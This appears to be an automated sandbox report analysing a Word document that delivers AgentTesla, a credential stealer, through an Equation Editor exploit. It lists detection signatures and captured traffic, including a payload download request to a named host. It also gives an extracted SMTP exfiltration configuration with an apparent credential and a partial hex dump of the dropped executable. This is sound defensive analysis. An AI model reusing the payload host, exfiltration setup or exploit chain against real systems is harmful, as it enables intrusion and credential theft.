Analysis Report RFQ ..doc

Overview

General Information

Sample Name: RFQ ..doc
Analysis ID: 385437
MD5: 8648267830a23e39c5bc162f4ad72f85
SHA1: 6a0436200203698fbb93170bb93ddc794d5f968e
SHA256: a1b7cd862762ff80cf95b544e80dfc6f887d9e0e9a8fffeec7c2574812b917d6
Tags: doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "efiz@glimpse-it.co@Mexico1.,mail.privateemail.com"}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00D5C980
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00D5CAC8
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: rotronics.com.ph
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 12:22:58 GMTServer: ApacheLast-Modified: Mon, 12 Apr 2021 05:14:50 GMTAccept-Ranges: bytesContent-Length: 733184Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa d6 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e2 0a 00 00 4c 00 00 00 00 00 00 3e 00 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec ff 0a 00 4f 00 00 00 00 20 0b 00 e8 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 e0 0a 00 00 20 00 00 00 e2 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 48 00 00 00 20 0b 00 00 4a 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 24 7d 00 00 18 76 00 00 03 00 00 00 01 00 00 06 3c f3 00 00 b0 0c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.122.60 198.54.122.60
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IWEB-ASCA IWEB-ASCA
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rotronics.com.phConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73207C3D-FA20-48C4-87C4-17800DB89026}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rotronics.com.phConnection: Keep-Alive
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: rotronics.com.ph
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350816750.0000000002C06000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350857695.0000000002C4E000.00000004.00000001.sdmp String found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.org
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp String found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.orgDL
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: http://ZAGYny.com
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://crl.lt/root-c/cacrl.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000003.2190303371.00000000062C6000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347867617.00000000007EE000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: http://mail.privateemail.com
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097214520.000000000287D000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354978003.0000000008720000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
.NET source code contains very large array initializations
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b022117B2u002d3EA8u002d40F0u002dB266u002d89CB8F70EABCu007d/u00391D3F524u002d3C30u002d4A8Au002dB058u002d9A8C003E6B70.cs Large array initialization: .cctor: array initializer size 11933
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54060 NtQueryInformationProcess, 4_2_00D54060
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54059 NtQueryInformationProcess, 4_2_00D54059
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00459000 4_2_00459000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00458898 4_2_00458898
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045A908 4_2_0045A908
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00456180 4_2_00456180
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00459A0D 4_2_00459A0D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00455208 4_2_00455208
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00456529 4_2_00456529
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00454E92 4_2_00454E92
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045D09C 4_2_0045D09C
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045C959 4_2_0045C959
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045C968 4_2_0045C968
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_004599C0 4_2_004599C0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045A9BC 4_2_0045A9BC
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CB48 4_2_0045CB48
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CB58 4_2_0045CB58
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045AB3D 4_2_0045AB3D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045AC71 4_2_0045AC71
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00457CB0 4_2_00457CB0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CDA8 4_2_0045CDA8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0045CFA0 4_2_0045CFA0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D568E8 4_2_00D568E8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59080 4_2_00D59080
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D56468 4_2_00D56468
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59408 4_2_00D59408
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5AD01 4_2_00D5AD01
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D52900 4_2_00D52900
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59E88 4_2_00D59E88
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D597E8 4_2_00D597E8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54B68 4_2_00D54B68
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D568D7 4_2_00D568D7
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D528F8 4_2_00D528F8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D56458 4_2_00D56458
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D50048 4_2_00D50048
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59071 4_2_00D59071
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D50006 4_2_00D50006
